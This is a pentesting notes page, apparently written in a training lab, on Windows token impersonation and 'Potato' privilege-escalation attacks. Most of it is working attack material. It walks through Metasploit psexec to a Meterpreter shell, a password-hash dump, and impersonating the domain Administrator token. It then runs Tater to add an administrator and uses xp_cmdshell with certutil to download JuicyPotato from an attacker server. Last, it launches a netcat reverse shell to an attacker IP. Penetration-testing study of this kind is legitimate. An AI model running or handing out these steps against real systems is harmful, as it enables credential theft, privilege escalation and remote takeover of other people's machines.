Token Impersonation - Potato attacks
What is it
Token are temp keys that give access to a system or network without credentials.
How to
Launch Metasploit
msfconsole
Choose the exploit:
use exploit/windows/smb/psexec
Set: rhosts, smbdomain, smbpass, smbuser, target (we can use
show targets
to have a list), payloadLaunch the attack:
run
We get a shell:
msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.0.2.8:4444 [*] 10.0.2.15:445 - Connecting to the server... [*] 10.0.2.15:445 - Authenticating to 10.0.2.15:445|marvel.local as user 'fcastle'... [!] 10.0.2.15:445 - peer_native_os is only available with SMB1 (current version: SMB3) [*] 10.0.2.15:445 - Uploading payload... oeyrkyrs.exe [*] 10.0.2.15:445 - Created \oeyrkyrs.exe... [*] Sending stage (200262 bytes) to 10.0.2.15 [+] 10.0.2.15:445 - Service started successfully... [*] 10.0.2.15:445 - Deleting \oeyrkyrs.exe... [*] Meterpreter session 1 opened (10.0.2.8:4444 -> 10.0.2.15:61871 ) at 2022-02-11 13:49:12 -0500 meterpreter >
Getting hashes:
hashdump
meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e6cedee56d27d175f48042b53cb6b242:::
Use tools:
load
(double tab to get the list of tools)load incognito
Incognito Commands ================== Command Description ------- ----------- add_group_user Attempt to add a user to a global group with all tokens add_localgroup_user Attempt to add a user to a local group with all tokens add_user Attempt to add a user with all tokens impersonate_token Impersonate specified token list_tokens List tokens available under current user context snarf_hashes Snarf challenge/response hashes for every token
list_tokens -u
meterpreter > list_tokens -u Delegation Tokens Available ======================================== Font Driver Host\UMFD-0 Font Driver Host\UMFD-1 Font Driver Host\UMFD-2 MARVEL\Administrator MARVEL\fcastle NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM Window Manager\DWM-1 Window Manager\DWM-2 Impersonation Tokens Available ======================================== No tokens available
Impersonate Administrator:
meterpreter > impersonate_token marvel\\administrator [+] Delegation token available [+] Successfully impersonated user MARVEL\Administrator meterpreter > shell Process 8576 created. Channel 1 created. Microsoft Windows [Version 10.0.19044.1288] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami marvel\administrator
If we hashdump again it will not work so we can rev2self to get back to the initial user
Any user that has logged in the target will have a token there until the target reboots
Potato Attacks
These attacks requires the
SeImpersonatePrivilege
orSeAssignPrimaryTokenPrivilege
to be enabled on the machine.
Hot potato
We can use Tater
powershell.exe -nop -ep bypass
Import-Module .\Tater.ps1
Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
Your user should be in the administrators group
net localgroup administrators
to checkSee here an example of a potato attack
Juicy potato
Enumeration after initial shell with MSSQL
Say we have a shell on an mssql instance
mssqlclient.py sql_dev@IP-ADD -windows-auth
We can enable command shell using
enable_xp_cmdshell
And then we will be able to type every command we need this way:
xp_cmdshell whoami /priv
We do!
Exploitation
Let's get JuicyPotato binary in our attacking machine
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
Let's serve the file to our target using python http server
python3 -m http.server 80
Let's take it in our shell using certutil
xp_cmdshell certutil.exe -urlcache -f http://10.10.14.117/JuicyPotato.exe C:\Tools\JuicyPotato.exe
Let's get an admin shell
xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.117 8443 -e cmd.exe" -t *
where -l is the COM server listening port, -p is the program to launch (cmd.exe), -a is the argument passed to cmd.exe, and -t is the createprocess call. We are trying both the CreateProcessWithTokenW and CreateProcessAsUser functions, which need SeImpersonate or SeAssignPrimaryToken privileges respectively.
Resources
Last updated